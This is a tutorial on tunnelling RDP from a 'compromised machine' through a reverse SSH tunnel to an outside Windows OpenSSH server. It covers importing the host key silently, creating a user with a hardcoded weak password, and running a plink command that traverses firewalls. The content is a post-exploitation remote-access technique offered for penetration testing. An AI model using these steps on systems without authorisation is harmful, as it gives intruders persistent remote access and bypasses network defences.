Establishing an RDP Connection Over a Reverse SSH Tunnel Using Windows Native OpenSSH Server

This guide explains how to establish an RDP connection over a reverse SSH tunnel using the native OpenSSH server in Windows 10/11 and plink.exe (a part of PuTTY). The method bypasses the need for interactive SSH server key acceptance, which is particularly useful in penetration testing scenarios. This setup can also be used to tunnel other protocols over SSH to traverse firewalls.

Prerequisites

1. Windows 10/11 machine: Native OpenSSH server enabled.
2. Plink.exe: Downloaded from the PuTTY website.
3. Admin rights: Required on both the SSH server and compromised machine.

Step 1: Enable and Configure the OpenSSH Server

1. Install the OpenSSH Server (if not already installed):

• Open Settings > Apps > Optional Features.
• Click Add a feature, search for OpenSSH Server, and install it.

2. Start the SSH Server:

• Open PowerShell as Administrator.
• Run:

  Start-Service sshd
  

• Ensure it starts on boot:

  Set-Service sshd -StartupType Automatic
  

3. Allow SSH in the Firewall:

• Run:

  New-NetFirewallRule -Name sshd -DisplayName "OpenSSH Server" -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22
  

4. Verify SSH Server:

• From another machine, test the connection using:

  ssh username@<OpenSSH-Server-IP>
  

Step 2: Create an SSH User

1. Open PowerShell as Administrator.
2. Add a new user:

   net user testuser Password123! /add
   

3. Add the user to the SSH access group:

   Add-LocalGroupMember -Group "Remote Desktop Users" -Member testuser
   

Step 3: Configure plink.exe for the Reverse Tunnel

1. Download plink.exe from the PuTTY website.
2. Copy plink.exe to the compromised machine.

Step 4: Accept the SSH Key Non-Interactively

1. From a machine that can connect to the OpenSSH server, manually accept the key:

   plink.exe -ssh <OpenSSH-Server-IP> -l testuser -pw Password123!
   

2. • When prompted, accept the host key.
   • The key is now saved to the registry at:
     HKEYCURRENTUSER\Software\SimonTatham\PuTTY\SshHostKeys.
2. Export the registry key:
3. • Open regedit.
   • Navigate to:
     HKEYCURRENTUSER\Software\SimonTatham\PuTTY\SshHostKeys.
   • Export the key and copy it to the compromised machine.
3. Import the key on the compromised machine:

   reg import <path-to-exported-reg-file>
   

Step 5: Establish the Reverse SSH Tunnel

1. On the compromised machine, execute plink.exe:

   plink.exe -ssh -P 22 -R 127.0.0.1:12345:127.0.0.1:3389 -l testuser -pw Password123! <OpenSSH-Server-IP>
   

2. • -R 127.0.0.1:12345:127.0.0.1:3389: Maps the local RDP port (3389) to the remote server’s port 12345.
   • Replace <OpenSSH-Server-IP> with the actual IP address of the SSH server.
2. Ensure the tunnel is active and open.

Step 6: Connect to the RDP Session

1. On the SSH server machine, open the RDP client:
2. • Press Win + R > Type mstsc.
   • Connect to:

     127.0.0.1:12345
     

2. Enter valid credentials for the compromised machine.

Notes

• Use a strong password for SSH user accounts.
• If tunneling over the internet, ensure port forwarding is set up on your router/firewall for the OpenSSH server.
• Test on a local LAN before deploying in a live environment.

Conclusion

Using the native Windows OpenSSH server simplifies the setup and removes the need for third-party SSH servers like FreeSSHd. The above method allows penetration testers, admins, or users to securely tunnel RDP sessions or other protocols over SSH without unnecessary complexity.